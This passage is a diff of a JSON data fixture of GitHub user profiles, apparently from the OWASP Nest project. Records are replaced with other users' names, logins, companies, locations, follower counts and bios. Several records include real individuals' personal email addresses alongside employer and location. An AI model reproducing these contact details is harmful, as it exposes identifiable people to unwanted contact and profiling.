"public_repositories_count": 29, - "created_at": "2015-01-19T21:26:13Z", - "updated_at": "2024-08-09T13:52:46Z", - "node_id": "MDQ6VXNlcjEwNjA0MzM1", + "following_count": 6, + "followers_count": 20, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2016-06-14T15:18:53Z", + "updated_at": "2024-07-29T18:34:46Z", + "node_id": "MDQ6VXNlcjE5OTMzMTIz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433753,24 +693652,24 @@ }, { "model": "github.user", - "pk": 2941, + "pk": 8310, "fields": { - "nest_created_at": "2024-09-12T02:38:30.099Z", - "nest_updated_at": "2024-09-12T02:38:30.099Z", - "name": "Christoph Kutzinski", - "login": "kutzi", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/175061?v=4", - "company": "", + "nest_created_at": "2024-09-22T10:35:10.779Z", + "nest_updated_at": "2024-09-22T19:48:34.921Z", + "name": "Amirhossein Aliakbarian", + "login": "amirhoseinaliakbarian", + "email": "amirhosein@aliakbarian.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4315981?v=4", + "company": "Booking.com", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 21, - "public_gists_count": 3, - "public_repositories_count": 49, - "created_at": "2010-01-01T19:50:38Z", - "updated_at": "2024-08-09T14:35:33Z", - "node_id": "MDQ6VXNlcjE3NTA2MQ==", + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 14, + "created_at": "2013-05-01T23:05:55Z", + "updated_at": "2024-07-11T15:26:18Z", + "node_id": "MDQ6VXNlcjQzMTU5ODE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433778,24 +693677,24 @@ }, { "model": "github.user", - "pk": 2942, + "pk": 8311, "fields": { - "nest_created_at": "2024-09-12T02:38:32.150Z", - "nest_updated_at": "2024-09-12T02:38:32.150Z", - "name": "Mike Kienenberger", - "login": "mkienenb", - "email": "mkienenb@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6233921?v=4", - "company": "", + "nest_created_at": "2024-09-22T10:35:11.088Z", + "nest_updated_at": "2024-09-22T19:48:35.235Z", + "name": "Brent Clark", + "login": "brentclark", + "email": "brentgclark@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2537847?v=4", + "company": "Xneelo", "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 3, - "public_gists_count": 7, - "public_repositories_count": 39, - "created_at": "2013-12-20T23:31:47Z", - "updated_at": "2024-06-28T14:38:56Z", - "node_id": "MDQ6VXNlcjYyMzM5MjE=", + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 45, + "created_at": "2012-10-11T15:09:27Z", + "updated_at": "2024-08-05T23:04:50Z", + "node_id": "MDQ6VXNlcjI1Mzc4NDc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433803,49 +693702,49 @@ }, { "model": "github.user", - "pk": 2943, + "pk": 8312, "fields": { - "nest_created_at": "2024-09-12T02:38:33.744Z", - "nest_updated_at": "2024-09-12T02:38:33.744Z", - "name": "Jens Borgland", - "login": "jborgland", + "nest_created_at": "2024-09-22T10:35:11.743Z", + "nest_updated_at": "2024-09-22T19:48:35.874Z", + "name": "Dennis Brown", + "login": "MutableLoss", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1174079?v=4", - "company": "", - "location": "Gothenburg", + "avatar_url": "https://avatars.githubusercontent.com/u/3156278?v=4", + "company": "CG Cookie", + "location": "Hawaii, USA", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2011-11-05T09:26:39Z", - "updated_at": "2024-08-30T11:04:29Z", - "node_id": "MDQ6VXNlcjExNzQwNzk=", - "bio": "", + "following_count": 23, + "followers_count": 15, + "public_gists_count": 8, + "public_repositories_count": 24, + "created_at": "2012-12-31T01:46:39Z", + "updated_at": "2024-09-12T03:06:45Z", + "node_id": "MDQ6VXNlcjMxNTYyNzg=", + "bio": "Functional JS, NodeJS, React/React-Native, Rust, and Networking Junkie. ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "mutableLoss" } }, { "model": "github.user", - "pk": 2944, + "pk": 8313, "fields": { - "nest_created_at": "2024-09-12T02:38:41.976Z", - "nest_updated_at": "2024-09-12T02:38:42.369Z", - "name": "Maxime Nadeau", - "login": "MaxNad", + "nest_created_at": "2024-09-22T10:35:12.392Z", + "nest_updated_at": "2024-09-22T19:48:36.546Z", + "name": "", + "login": "Fregf", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3847037?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/34214781?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 8, - "followers_count": 38, - "public_gists_count": 6, - "public_repositories_count": 18, - "created_at": "2013-03-12T20:46:39Z", - "updated_at": "2024-08-16T11:21:38Z", - "node_id": "MDQ6VXNlcjM4NDcwMzc=", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2017-12-03T16:16:21Z", + "updated_at": "2024-08-29T19:11:24Z", + "node_id": "MDQ6VXNlcjM0MjE0Nzgx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433853,24 +693752,24 @@ }, { "model": "github.user", - "pk": 2945, + "pk": 8314, "fields": { - "nest_created_at": "2024-09-12T02:38:46.044Z", - "nest_updated_at": "2024-09-12T02:38:46.044Z", - "name": "PLRoman", - "login": "plr0man", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24785104?v=4", - "company": "@bugcrowd", - "location": "United States", + "nest_created_at": "2024-09-22T10:35:12.702Z", + "nest_updated_at": "2024-09-22T19:48:59.933Z", + "name": "Khiem Doan", + "login": "khiemdoan", + "email": "doankhiem.crazy@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/15646249?v=4", + "company": "VNPT Cyber Immunity", + "location": "Hanoi, Vietnam", "collaborators_count": 0, - "following_count": 0, - "followers_count": 23, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2016-12-27T02:52:16Z", - "updated_at": "2024-05-26T15:10:06Z", - "node_id": "MDQ6VXNlcjI0Nzg1MTA0", + "following_count": 155, + "followers_count": 65, + "public_gists_count": 31, + "public_repositories_count": 86, + "created_at": "2015-11-04T06:48:23Z", + "updated_at": "2024-07-30T08:08:07Z", + "node_id": "MDQ6VXNlcjE1NjQ2MjQ5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433878,24 +693777,24 @@ }, { "model": "github.user", - "pk": 2946, + "pk": 8315, "fields": { - "nest_created_at": "2024-09-12T02:38:47.689Z", - "nest_updated_at": "2024-09-12T02:38:47.689Z", - "name": "Tomáš Polešovský", - "login": "topolik", + "nest_created_at": "2024-09-22T10:35:13.335Z", + "nest_updated_at": "2024-09-22T19:48:37.490Z", + "name": "", + "login": "MichaelHaas", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/148147?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3818201?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 50, - "public_gists_count": 40, - "public_repositories_count": 35, - "created_at": "2009-11-03T07:16:42Z", - "updated_at": "2024-09-10T17:47:39Z", - "node_id": "MDQ6VXNlcjE0ODE0Nw==", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2013-03-09T16:28:47Z", + "updated_at": "2021-06-17T08:28:48Z", + "node_id": "MDQ6VXNlcjM4MTgyMDE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433903,49 +693802,49 @@ }, { "model": "github.user", - "pk": 2947, + "pk": 8316, "fields": { - "nest_created_at": "2024-09-12T02:38:48.925Z", - "nest_updated_at": "2024-09-12T02:38:48.925Z", - "name": "Pablo Tamarit", - "login": "ptamarit", + "nest_created_at": "2024-09-22T10:35:14.392Z", + "nest_updated_at": "2024-09-22T19:48:38.431Z", + "name": "Sven Höxter", + "login": "hoexter", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2046893?v=4", - "company": "CERN", - "location": "Geneva, Switzerland", + "avatar_url": "https://avatars.githubusercontent.com/u/24830816?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 7, - "public_gists_count": 2, - "public_repositories_count": 25, - "created_at": "2012-07-26T14:36:50Z", - "updated_at": "2024-09-02T12:44:46Z", - "node_id": "MDQ6VXNlcjIwNDY4OTM=", - "bio": "Full-stack 🥞 software engineer 👨‍💻 working on @zenodo 📚 and @inveniosoftware 🔎", + "following_count": 2, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2016-12-29T18:38:36Z", + "updated_at": "2024-08-12T07:11:49Z", + "node_id": "MDQ6VXNlcjI0ODMwODE2", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2948, + "pk": 8317, "fields": { - "nest_created_at": "2024-09-12T02:38:50.146Z", - "nest_updated_at": "2024-09-12T02:38:50.146Z", + "nest_created_at": "2024-09-22T10:35:15.088Z", + "nest_updated_at": "2024-09-22T19:48:39.061Z", "name": "", - "login": "formanek", + "login": "XeroChen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2494913?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20438791?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, + "following_count": 3, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2012-10-05T15:30:18Z", - "updated_at": "2018-06-01T20:45:23Z", - "node_id": "MDQ6VXNlcjI0OTQ5MTM=", + "public_repositories_count": 15, + "created_at": "2016-07-13T11:52:54Z", + "updated_at": "2023-11-27T09:17:48Z", + "node_id": "MDQ6VXNlcjIwNDM4Nzkx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433953,24 +693852,24 @@ }, { "model": "github.user", - "pk": 2949, + "pk": 8318, "fields": { - "nest_created_at": "2024-09-12T02:38:54.536Z", - "nest_updated_at": "2024-09-12T02:40:19.611Z", - "name": "Björn Kautler", - "login": "Vampire", - "email": "Bjoern@Kautler.net", - "avatar_url": "https://avatars.githubusercontent.com/u/325196?v=4", + "nest_created_at": "2024-09-22T10:35:15.715Z", + "nest_updated_at": "2024-09-22T19:48:39.714Z", + "name": "", + "login": "agusmu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1005437?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 79, - "public_gists_count": 1, - "public_repositories_count": 127, - "created_at": "2010-07-07T10:45:56Z", - "updated_at": "2024-08-26T11:22:35Z", - "node_id": "MDQ6VXNlcjMyNTE5Ng==", + "following_count": 4, + "followers_count": 13, + "public_gists_count": 101, + "public_repositories_count": 38, + "created_at": "2011-08-26T00:22:54Z", + "updated_at": "2024-06-30T09:35:35Z", + "node_id": "MDQ6VXNlcjEwMDU0Mzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -433978,24 +693877,24 @@ }, { "model": "github.user", - "pk": 2950, + "pk": 8319, "fields": { - "nest_created_at": "2024-09-12T02:38:55.779Z", - "nest_updated_at": "2024-09-12T02:38:55.779Z", + "nest_created_at": "2024-09-22T10:35:16.370Z", + "nest_updated_at": "2024-09-22T19:48:40.335Z", "name": "", - "login": "archmageirvine", + "login": "flo405", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/426957?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/80383285?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 16, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2010-10-04T19:10:32Z", - "updated_at": "2024-07-16T22:49:24Z", - "node_id": "MDQ6VXNlcjQyNjk1Nw==", + "public_repositories_count": 17, + "created_at": "2021-03-10T07:19:41Z", + "updated_at": "2024-07-30T15:23:22Z", + "node_id": "MDQ6VXNlcjgwMzgzMjg1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434003,49 +693902,49 @@ }, { "model": "github.user", - "pk": 2951, + "pk": 8320, "fields": { - "nest_created_at": "2024-09-12T02:39:00.393Z", - "nest_updated_at": "2024-09-12T02:39:00.393Z", - "name": "JAEHUN_LEE", - "login": "GSoJC234", + "nest_created_at": "2024-09-22T10:35:16.697Z", + "nest_updated_at": "2024-09-22T19:48:40.662Z", + "name": "", + "login": "henkworks", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23181535?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/72927253?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2016-11-01T02:37:03Z", - "updated_at": "2024-08-20T16:24:52Z", - "node_id": "MDQ6VXNlcjIzMTgxNTM1", - "bio": "POSTECH", + "public_repositories_count": 3, + "created_at": "2020-10-15T13:21:15Z", + "updated_at": "2021-09-30T14:13:31Z", + "node_id": "MDQ6VXNlcjcyOTI3MjUz", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2952, + "pk": 8321, "fields": { - "nest_created_at": "2024-09-12T02:39:02.860Z", - "nest_updated_at": "2024-09-12T02:39:04.502Z", - "name": "Jyoti Gajrani", - "login": "jyotigajrani", - "email": "jyotigajrani@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/12912589?v=4", - "company": "Malviya National Institute of Technology", - "location": "Jaipur (INDIA)", + "nest_created_at": "2024-09-22T10:35:17.017Z", + "nest_updated_at": "2024-09-22T19:48:40.976Z", + "name": "", + "login": "ignatiev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/800285?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, + "following_count": 1, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2015-06-16T13:44:29Z", - "updated_at": "2023-07-08T11:03:17Z", - "node_id": "MDQ6VXNlcjEyOTEyNTg5", + "public_repositories_count": 5, + "created_at": "2011-05-20T11:46:21Z", + "updated_at": "2024-08-20T08:22:40Z", + "node_id": "MDQ6VXNlcjgwMDI4NQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434053,24 +693952,24 @@ }, { "model": "github.user", - "pk": 2953, + "pk": 8322, "fields": { - "nest_created_at": "2024-09-12T02:39:09.978Z", - "nest_updated_at": "2024-09-12T02:39:09.978Z", - "name": "Boris Petrov", - "login": "boris-petrov", + "nest_created_at": "2024-09-22T10:35:17.335Z", + "nest_updated_at": "2024-09-22T19:48:41.312Z", + "name": "", + "login": "ihacku", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/278940?v=4", - "company": "@profuz", - "location": "Sofia, Bulgaria", + "avatar_url": "https://avatars.githubusercontent.com/u/2731416?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 24, - "followers_count": 46, - "public_gists_count": 1, - "public_repositories_count": 49, - "created_at": "2010-05-17T07:07:01Z", - "updated_at": "2023-11-06T09:00:15Z", - "node_id": "MDQ6VXNlcjI3ODk0MA==", + "following_count": 10, + "followers_count": 75, + "public_gists_count": 12, + "public_repositories_count": 36, + "created_at": "2012-11-06T02:11:56Z", + "updated_at": "2024-07-09T12:31:52Z", + "node_id": "MDQ6VXNlcjI3MzE0MTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434078,24 +693977,24 @@ }, { "model": "github.user", - "pk": 2954, + "pk": 8323, "fields": { - "nest_created_at": "2024-09-12T02:39:12.830Z", - "nest_updated_at": "2024-09-12T02:39:12.830Z", + "nest_created_at": "2024-09-22T10:35:17.642Z", + "nest_updated_at": "2024-09-22T19:48:41.651Z", "name": "", - "login": "plokta", + "login": "jamuse", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7414587?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2136516?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 5, - "public_gists_count": 4, - "public_repositories_count": 7, - "created_at": "2014-04-26T15:26:14Z", - "updated_at": "2021-12-08T10:49:57Z", - "node_id": "MDQ6VXNlcjc0MTQ1ODc=", + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2012-08-11T19:06:27Z", + "updated_at": "2020-08-31T18:55:34Z", + "node_id": "MDQ6VXNlcjIxMzY1MTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434103,24 +694002,24 @@ }, { "model": "github.user", - "pk": 2955, + "pk": 8324, "fields": { - "nest_created_at": "2024-09-12T02:39:14.454Z", - "nest_updated_at": "2024-09-12T02:39:14.454Z", - "name": "Magnus Karlsen", - "login": "mamk95", + "nest_created_at": "2024-09-22T10:35:18.272Z", + "nest_updated_at": "2024-09-22T19:48:42.345Z", + "name": "Lucas Ostmann", + "login": "lostmann-owl-it", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10944333?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/181358511?v=4", + "company": "@Ostwestfalen-Lippe-IT", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, + "following_count": 2, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2015-02-10T16:29:08Z", - "updated_at": "2024-04-12T13:51:12Z", - "node_id": "MDQ6VXNlcjEwOTQ0MzMz", + "public_repositories_count": 2, + "created_at": "2024-09-12T13:00:52Z", + "updated_at": "2024-09-16T06:42:20Z", + "node_id": "U_kgDOCs9Prw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434128,24 +694027,24 @@ }, { "model": "github.user", - "pk": 2956, + "pk": 8325, "fields": { - "nest_created_at": "2024-09-12T02:39:22.441Z", - "nest_updated_at": "2024-09-12T02:39:22.441Z", - "name": "Dmitry Polienko", - "login": "nigredo-tori", - "email": "nigredo.tori@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5962285?v=4", + "nest_created_at": "2024-09-22T10:35:18.594Z", + "nest_updated_at": "2024-09-22T19:48:42.653Z", + "name": "na1ex", + "login": "na1ex", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28897987?v=4", "company": "", - "location": "Novosibirsk, Russia", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 14, - "public_gists_count": 1, - "public_repositories_count": 80, - "created_at": "2013-11-17T18:03:07Z", - "updated_at": "2024-08-17T08:06:17Z", - "node_id": "MDQ6VXNlcjU5NjIyODU=", + "following_count": 4, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2017-05-23T13:25:29Z", + "updated_at": "2024-08-30T16:51:56Z", + "node_id": "MDQ6VXNlcjI4ODk3OTg3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434153,24 +694052,24 @@ }, { "model": "github.user", - "pk": 2957, + "pk": 8326, "fields": { - "nest_created_at": "2024-09-12T02:39:27.530Z", - "nest_updated_at": "2024-09-12T02:39:27.530Z", - "name": "Ullrich Hafner", - "login": "uhafner", + "nest_created_at": "2024-09-22T10:35:18.907Z", + "nest_updated_at": "2024-09-22T19:48:42.964Z", + "name": "", + "login": "siric", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/503338?v=4", - "company": "University of Applied Sciences Munich", - "location": "Munich, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/31568598?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 147, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 72, - "created_at": "2010-11-30T12:54:06Z", - "updated_at": "2024-09-08T17:34:31Z", - "node_id": "MDQ6VXNlcjUwMzMzOA==", + "public_repositories_count": 0, + "created_at": "2017-09-02T14:07:57Z", + "updated_at": "2022-12-27T00:28:55Z", + "node_id": "MDQ6VXNlcjMxNTY4NTk4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434178,99 +694077,124 @@ }, { "model": "github.user", - "pk": 2958, + "pk": 8327, "fields": { - "nest_created_at": "2024-09-12T02:39:28.795Z", - "nest_updated_at": "2024-09-12T02:39:28.795Z", - "name": "Jorge Solórzano", - "login": "jorsol", + "nest_created_at": "2024-09-22T10:35:19.218Z", + "nest_updated_at": "2024-09-22T19:48:43.273Z", + "name": "", + "login": "soufianebenali", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3739977?v=4", - "company": "@ongres", - "location": "Nicaragua / Spain", + "avatar_url": "https://avatars.githubusercontent.com/u/30629716?v=4", + "company": "", + "location": "Zurich, Switzerland", "collaborators_count": 0, - "following_count": 41, - "followers_count": 32, - "public_gists_count": 0, - "public_repositories_count": 61, - "created_at": "2013-03-01T16:12:19Z", - "updated_at": "2024-08-26T11:54:22Z", - "node_id": "MDQ6VXNlcjM3Mzk5Nzc=", - "bio": "Java developer, Postgres advocate, and K8s enthusiast.", + "following_count": 4, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 9, + "created_at": "2017-08-01T14:49:55Z", + "updated_at": "2024-08-10T19:25:41Z", + "node_id": "MDQ6VXNlcjMwNjI5NzE2", + "bio": "DevOps Engineer", "is_hireable": false, - "twitter_username": "jorsol_com" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2959, + "pk": 8328, "fields": { - "nest_created_at": "2024-09-12T02:39:30.034Z", - "nest_updated_at": "2024-09-12T02:39:30.034Z", - "name": "BlueSkySec", - "login": "BlueSKySec", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/66005070?v=4", + "nest_created_at": "2024-09-22T10:35:19.882Z", + "nest_updated_at": "2024-09-22T19:48:43.933Z", + "name": "ThanhPT", + "login": "thanhpt1708", + "email": "thanhpt1708@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22339347?v=4", "company": "", - "location": "Cologne, Germany", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 22, - "public_repositories_count": 1, - "created_at": "2020-05-27T08:29:55Z", - "updated_at": "2024-04-04T13:27:43Z", - "node_id": "MDQ6VXNlcjY2MDA1MDcw", + "following_count": 9, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2016-09-21T06:42:58Z", + "updated_at": "2024-09-14T16:16:57Z", + "node_id": "MDQ6VXNlcjIyMzM5MzQ3", "bio": "", "is_hireable": false, - "twitter_username": "BlueSkySec" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2960, + "pk": 8329, "fields": { - "nest_created_at": "2024-09-12T02:39:33.779Z", - "nest_updated_at": "2024-09-12T02:39:33.779Z", - "name": "", - "login": "mhnot", + "nest_created_at": "2024-09-22T10:35:20.207Z", + "nest_updated_at": "2024-09-22T19:48:44.245Z", + "name": "vandan rohatgi", + "login": "vandanrohatgi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37579521?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/43648786?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-03-20T10:58:26Z", - "updated_at": "2022-08-08T08:32:08Z", - "node_id": "MDQ6VXNlcjM3NTc5NTIx", - "bio": "", + "following_count": 2, + "followers_count": 7, + "public_gists_count": 2, + "public_repositories_count": 33, + "created_at": "2018-09-27T15:53:35Z", + "updated_at": "2024-06-17T04:21:34Z", + "node_id": "MDQ6VXNlcjQzNjQ4Nzg2", + "bio": "Software Dev, Cyber security", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2961, + "pk": 8330, "fields": { - "nest_created_at": "2024-09-12T02:39:35.059Z", - "nest_updated_at": "2024-09-12T02:39:35.059Z", + "nest_created_at": "2024-09-22T10:35:20.541Z", + "nest_updated_at": "2024-09-22T19:48:44.568Z", + "name": "İlteriş Eroğlu", + "login": "linuxgemini", + "email": "github@linuxgemini.space", + "avatar_url": "https://avatars.githubusercontent.com/u/4682655?v=4", + "company": "", + "location": "Ankara, Turkey", + "collaborators_count": 0, + "following_count": 113, + "followers_count": 130, + "public_gists_count": 27, + "public_repositories_count": 62, + "created_at": "2013-06-12T20:17:20Z", + "updated_at": "2024-09-17T09:47:20Z", + "node_id": "MDQ6VXNlcjQ2ODI2NTU=", + "bio": "I do things that are small and useless enough that someone finds it useful years later.", + "is_hireable": true, + "twitter_username": "linuxgemini" + } +}, +{ + "model": "github.user", + "pk": 8331, + "fields": { + "nest_created_at": "2024-09-22T10:35:20.848Z", + "nest_updated_at": "2024-09-22T19:48:44.879Z", "name": "", - "login": "pauser0000001", + "login": "4ft35t", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1436047?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2051049?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2012-02-14T08:39:45Z", - "updated_at": "2021-05-01T10:36:42Z", - "node_id": "MDQ6VXNlcjE0MzYwNDc=", + "following_count": 23, + "followers_count": 32, + "public_gists_count": 42, + "public_repositories_count": 106, + "created_at": "2012-07-27T08:47:31Z", + "updated_at": "2024-02-28T14:15:10Z", + "node_id": "MDQ6VXNlcjIwNTEwNDk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434278,99 +694202,99 @@ }, { "model": "github.user", - "pk": 2962, + "pk": 8332, "fields": { - "nest_created_at": "2024-09-12T02:39:37.894Z", - "nest_updated_at": "2024-09-12T02:39:37.894Z", - "name": "", - "login": "hiteshgargavid", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71629585?v=4", - "company": "", + "nest_created_at": "2024-09-22T10:35:21.160Z", + "nest_updated_at": "2024-09-22T19:48:45.200Z", + "name": "Waris Hafidz", + "login": "abudawud", + "email": "warishafidz@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/15796342?v=4", + "company": "PT Benih CItra Asia", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-09-21T07:13:42Z", - "updated_at": "2022-08-19T13:54:05Z", - "node_id": "MDQ6VXNlcjcxNjI5NTg1", - "bio": "", + "following_count": 3, + "followers_count": 13, + "public_gists_count": 12, + "public_repositories_count": 85, + "created_at": "2015-11-11T07:48:02Z", + "updated_at": "2024-08-28T11:39:51Z", + "node_id": "MDQ6VXNlcjE1Nzk2MzQy", + "bio": "HA Architecture Enthusiast | DevOps Engineer | GNU/Linux User", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2963, + "pk": 8333, "fields": { - "nest_created_at": "2024-09-12T02:39:39.523Z", - "nest_updated_at": "2024-09-12T02:39:39.523Z", - "name": "Roman Plášil", - "login": "Quiark", + "nest_created_at": "2024-09-22T10:35:21.504Z", + "nest_updated_at": "2024-09-22T19:48:45.574Z", + "name": "bebop", + "login": "Homesteady", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59075?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9058339?v=4", "company": "", - "location": "Hong Kong", + "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 15, - "public_gists_count": 21, - "public_repositories_count": 69, - "created_at": "2009-03-01T12:41:42Z", - "updated_at": "2024-04-09T12:57:28Z", - "node_id": "MDQ6VXNlcjU5MDc1", - "bio": "sw dev, #crypto, #infosec, #ethereum", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-10-07T20:11:54Z", + "updated_at": "2024-04-29T01:25:34Z", + "node_id": "MDQ6VXNlcjkwNTgzMzk=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2964, + "pk": 8334, "fields": { - "nest_created_at": "2024-09-12T02:39:42.402Z", - "nest_updated_at": "2024-09-12T02:39:42.402Z", - "name": "", - "login": "j0ck66", + "nest_created_at": "2024-09-22T10:35:22.439Z", + "nest_updated_at": "2024-09-22T19:48:47.011Z", + "name": "Ashish Dixit", + "login": "tundal45", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46952968?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/59220?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-01-23T06:17:21Z", - "updated_at": "2024-04-28T08:35:37Z", - "node_id": "MDQ6VXNlcjQ2OTUyOTY4", - "bio": "", + "public_gists_count": 33, + "public_repositories_count": 57, + "created_at": "2009-03-02T01:25:45Z", + "updated_at": "2024-03-05T19:04:57Z", + "node_id": "MDQ6VXNlcjU5MjIw", + "bio": "Who wants to know?", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2965, + "pk": 8335, "fields": { - "nest_created_at": "2024-09-12T02:39:44.495Z", - "nest_updated_at": "2024-09-12T02:39:44.495Z", + "nest_created_at": "2024-09-22T10:35:23.448Z", + "nest_updated_at": "2024-09-22T19:48:48.042Z", "name": "", - "login": "kaappiyan", + "login": "yersinia", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33218858?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/96593?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 13, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2017-10-30T09:10:15Z", - "updated_at": "2021-07-14T20:14:30Z", - "node_id": "MDQ6VXNlcjMzMjE4ODU4", + "public_repositories_count": 11, + "created_at": "2009-06-18T08:13:18Z", + "updated_at": "2021-12-30T13:01:43Z", + "node_id": 